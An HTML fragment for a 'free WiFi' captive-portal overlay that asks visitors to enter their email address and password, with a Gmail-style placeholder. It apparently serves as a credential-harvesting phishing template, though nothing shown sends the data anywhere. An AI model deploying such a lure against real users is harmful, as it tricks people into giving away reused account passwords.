2017-11-16 16:42:22 +11:00

16 lines
654 B
Plaintext
Executable File

<div id="pa_overlay-back"></div>
<div class="pa_form-container">
<h3 style="display: inline">Enjoy free WiFi between</h3>
<h2><div id="pa_date"></div></h2>
<div style="margin: 0 auto">
<p>Simply enter your email address and password. If you do not already have an account with us one will be created for you.</p>
</div>
<br /><br />
<input class="pa_form-field" type="text" id="pa_email" placeholder="you@gmail.com" />
<input class="pa_form-field" type="password" id="pa_password" placeholder="Password" />
<br /><br />
<div class="pa_submit-container">
<input class="pa_submit-button" type="submit" value="Submit" />
</div>
</div>
</div>